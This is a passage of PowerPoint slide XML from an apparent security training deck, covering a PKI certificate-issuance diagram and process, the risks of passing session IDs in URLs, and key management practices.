          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6617422" y="1492115"/>
            <a:ext cx="1099721" cy="1001064"/>
            <a:chOff x="2105765" y="3276600"/>
            <a:chExt cx="914400" cy="824714"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="16" name="Picture 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05765" y="32766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548261" y="3644114"/>
              <a:ext cx="400050" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="Group 17"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5679153" y="3639879"/>
            <a:ext cx="1191277" cy="1387161"/>
            <a:chOff x="7534634" y="3352800"/>
            <a:chExt cx="1191277" cy="1387161"/>
          </a:xfrm>
        </p:grpSpPr>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534634" y="3352800"/>
              <a:ext cx="935204" cy="93345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05340" y="4049533"/>
              <a:ext cx="920571" cy="690428"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4206777" y="2425295"/>
            <a:ext cx="688885" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503483" y="2425295"/>
            <a:ext cx="2082150" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Digital Certificates</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6932962" y="2440675"/>
            <a:ext cx="914400" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>RA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2585633" y="4747049"/>
            <a:ext cx="1524000" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Certificate Repository Database</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5535919" y="5012863"/>
            <a:ext cx="1524000" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Certificate Management System</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1836372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49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341925" y="1302040"/>
            <a:ext cx="8460150" cy="2651135"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0"/>
              <a:t>John asks CA to issue certificate.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0"/>
              <a:t>CA validates identity &amp; issues certificate.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0"/>
              <a:t>John presents certificate to Sue.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0"/>
              <a:t>Sue doesn’t know John, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" kern="0" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0"/>
              <a:t>so asks CA to verify identity.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0"/>
              <a:t>CA checks if certificate is valid.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0"/>
              <a:t>CA tells Sue certificate is valid.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0"/>
              <a:t>Sue now trusts John.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The PKI Process</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5138617" y="1395392"/>
            <a:ext cx="1219200" cy="969179"/>
            <a:chOff x="3962400" y="1524000"/>
            <a:chExt cx="914400" cy="725487"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Picture 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62400" y="1524000"/>
              <a:ext cx="914400" cy="68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9600" y="1981200"/>
              <a:ext cx="267482"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5348185" y="2300835"/>
            <a:ext cx="688885" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CA</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80759" y="4924926"/>
            <a:ext cx="1134641" cy="1086187"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Group 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6604887" y="5162915"/>
            <a:ext cx="1169634" cy="1314452"/>
            <a:chOff x="6923784" y="4814915"/>
            <a:chExt cx="1169634" cy="1314452"/>
          </a:xfrm>
        </p:grpSpPr>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7672478" y="5233864"/>
              <a:ext cx="567560" cy="27432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7385591" y="4961535"/>
              <a:ext cx="567560" cy="27432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3784" y="5388692"/>
              <a:ext cx="987567" cy="740675"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Content Placeholder 2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396813" y="5067537"/>
            <a:ext cx="1177427" cy="1086187"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Straight Arrow Connector 15"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6269517" y="2463552"/>
            <a:ext cx="1594282" cy="24498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6148438" y="2754863"/>
            <a:ext cx="1296622" cy="231267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flipH="1">
            <a:off x="3563007" y="5435244"/>
            <a:ext cx="3320310"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V="1">
            <a:off x="3621422" y="2755682"/>
            <a:ext cx="1733989" cy="237811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H="1">
            <a:off x="3202759" y="2489031"/>
            <a:ext cx="1816953" cy="244726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TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2648399" y="6153724"/>
            <a:ext cx="838200" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8077200" y="6022668"/>
            <a:ext cx="838200" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>John</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4199980" y="3924933"/>
            <a:ext cx="312906" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5021793" y="1669063"/>
            <a:ext cx="312906" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="Straight Arrow Connector 24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3789903" y="6104086"/>
            <a:ext cx="2743668" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="76200" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="triangle"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7364601" y="4127026"/>
            <a:ext cx="312906" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6483843" y="3391624"/>
            <a:ext cx="312906" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5147196" y="5239764"/>
            <a:ext cx="312906" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="TextBox 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4356433" y="2970976"/>
            <a:ext cx="312906" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>6</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="TextBox 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5005171" y="5919420"/>
            <a:ext cx="312906" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>7</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="356234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376D-5553-4D01-9215-AD9760AAB559}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Methods for Passing Session IDs (Slide 1 of 3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{503746AF-0ED3-4279-ACD5-8C95F2DD4F9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Table 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{454718CA-A77B-4BE6-A1C5-F120E31C5539}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="152400" y="1066800"/>
          <a:ext cx="8801784" cy="3450336"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1295400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2227582380"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3505200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2354953793"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4001184">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3235437500"/>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Benefits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Disadvantages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GET request with session ID embedded in the URL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Can be used even if the client web browser has high security settings and has disabled the use of cookies.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If the client shares URL, session ID is included.</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Depending upon the web browser type, URL information is commonly sent in the HTTP REFERER field. This information can be used to ensure a site visitor has followed a particular path within the web application, and subsequently used to identify some common forms of attack.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An attacker can review the browser history file or stored favorites and follow the same URL.</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URL information is logged by intermediary systems such as firewalls and proxy servers. Thus, anyone with access to these logs can observe the URL and use the information in an attack.</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Because the URL is exposed and directly editable, the skills and equipment necessary to carry out an attack are minimal.</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mn-lt"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>When a client navigates to a new website, the URL containing the session information can be sent to the new site via the HTTP REFERER field.</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Calibri"/>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5623263"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1622089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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Regardless of the kind of encryption you implement, one of your biggest concerns will always be key management.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Because the key holds the secret to decryption, you must make sure that the keys are stored safely so that they cannot be stolen or compromised.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In addition, keys should have a limited lifespan.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The longer you use the same key, the greater your chance of that key being cracked (discovered).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many keys (particularly those in digital certificates) have a default lifespan of only one or two years.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ensure that you have a policy regarding the mechanism for safely keeping keys.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most operating systems and applications that use encryption have built-in mechanisms for storing keys. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Key Management</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="425552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51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As you design and develop security features in your software that are based on cryptography, there are various key management scenarios that you may have to account for.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Key control measures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>—Determine who has access to keys and how they are assigned.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Key recovery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>—How lost keys are recovered.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Key storage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>—A secure repository for key assignment records. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Key retirement/destruction</a:t>
            </a:r>
            <a:r>
